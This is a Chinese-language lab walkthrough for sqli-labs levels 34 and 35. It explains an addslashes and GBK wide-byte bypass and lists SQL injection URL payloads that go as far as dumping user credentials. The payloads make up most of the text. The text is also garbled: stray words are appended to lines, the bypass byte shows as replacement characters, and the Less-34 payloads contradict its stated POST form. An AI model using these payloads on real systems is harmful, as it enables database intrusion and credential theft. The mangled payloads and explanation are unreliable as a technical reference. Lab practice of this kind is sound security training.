開始挑戰第三十四關和第三十五關(Bypass add addslashes)php
0x1查看源碼mysql
本關是post型的注入漏洞,一樣的也是將post過來的內容進行了 ' \ 的處理。sql
if(isset($_POST['uname']) && isset($_POST['passwd'])) { $uname1=$_POST['uname']; $passwd1=$_POST['passwd']; //echo "username before addslashes is :".$uname1 ."<br>"; //echo "Input password before addslashes is : ".$passwd1. "<br>"; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'User Name:'.$uname1); fwrite($fp,'Password:'.$passwd1."\n"); fclose($fp); $uname = addslashes($uname1); $passwd= addslashes($passwd1); //echo "username after addslashes is :".$uname ."<br>"; //echo "Input password after addslashes is : ".$passwd; // connectivity mysql_query("SET NAMES gbk"); @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
0x2注入方法ide
以前咱們的方法就是將過濾函數添加的 \ 給吃掉。而get型的方式咱們是以url形式提交的,所以數據會經過URLencode,如何將方法用在post型的注入當中,咱們此處介紹一個新的方法。將utf-8轉換爲utf-16或 utf-32,例如將 ' 轉爲utf-16爲�' 。(http://tool.chinaz.com/tools/urlencode.aspx)咱們就能夠利用這個方式進行嘗試。函數
剩餘其餘payloadpost
http://localhost:81/sqli-labs-master/Less-34/index.php?id=1�' or 1=1--+ http://localhost:81/sqli-labs-master/Less-34/index.php?id=1�' or 1=1--+ http://localhost:81/sqli-labs-master/Less-34/index.php?id=1�' oder by 2--+ http://localhost:81/sqli-labs-master/Less-34/index.php?id=0�' union select 1,2--+ http://localhost:81/sqli-labs-master/Less-34/index.php?id=0�' union select 1,database()--+ http://localhost:81/sqli-labs-master/Less-34/index.php?id=0�' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+ http://localhost:81/sqli-labs-master/Less-34/index.php?id=0�' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users')--+ http://localhost:81/sqli-labs-master/Less-34/index.php?id=0�' union select 1,(select group_concat(username,password) from users)--+
0x3 第三十五關url
查看源碼,雖然仍是存在alashes函數,但sql語句不須要進行閉合,因此就不用使用到單引號等等,那這樣就和普通的注入沒什麼區別了spa
function check_addslashes($string) { $string = addslashes($string); return $string; } // take the variables if(isset($_GET['id'])) { $id=check_addslashes($_GET['id']); //echo "The filtered request is :" .$id . "<br>"; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity mysql_query("SET NAMES gbk"); $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
一樣上payloadcode
http://localhost:81/sqli-labs-master/Less-35/index.php?id=1 and1=1--+ http://localhost:81/sqli-labs-master/Less-35/index.php?id=1 and1=1--+ http://localhost:81/sqli-labs-master/Less-35/index.php?id=1 oder by 3--+ http://localhost:81/sqli-labs-master/Less-35/index.php?id=0 union select 1,2,3--+ http://localhost:81/sqli-labs-master/Less-35/index.php?id=0 union select 1,database(),3--+ http://localhost:81/sqli-labs-master/Less-35/index.php?id=0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+ http://localhost:81/sqli-labs-master/Less-35/index.php?id=0 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3--+ http://localhost:81/sqli-labs-master/Less-35/index.php?id=0 union select 1,(select group_concat(username,password) from users),3--+